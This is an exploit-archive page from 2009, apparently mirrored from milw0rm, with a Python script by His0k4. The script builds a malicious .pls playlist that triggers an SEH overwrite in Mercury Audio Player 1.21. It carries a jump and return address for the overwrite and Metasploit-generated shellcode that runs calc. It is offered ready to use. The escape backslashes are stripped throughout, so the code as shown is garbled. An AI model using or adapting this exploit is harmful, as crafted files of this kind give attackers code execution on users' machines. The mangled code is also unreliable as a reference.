[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mercury Audio Player 1.21 (.pls) SEH Overwrite Exploit
# Published : 2009-04-30
# Author : His0k4
# Previous Title : Mercury Audio Player 1.21 (.b4s) Local Stack Overflow Exploit
# Next Title : libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
#usage: exploit.py
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploitn"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " greetz: TO ELITE ALGERIANS,snakespc.comn"
print "**************************************************************************"
header1 = (
"x5bx50x6cx61x79x6cx69x73x74x5dx0dx0ax46x69x6cx65"
"x31x3d")
header2 = (
"x2ex6dx70x33x0dx0ax54x69x74x6cx65x31x3dx20x73x69"
"x6cx65x6ex63x65x20x69x73x20x67x6fx6cx64x0dx0ax4e"
"x75x6dx62x65x72x4fx66x45x6ex74x72x69x65x73x3dx31"
"x0dx0ax56x65x72x73x69x6fx6ex3dx32x0dx0a")
buff = "x41" * 31
next_seh = "xEBx06x90x90"
seh = "xB8x15xD1x72" #msacm32.drv
junk = "x41"*3000
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8"
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73"
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f"
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b"
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50"
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12"
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd"
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e"
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32"
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36")
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"
# www.Syue.com [2009-04-30]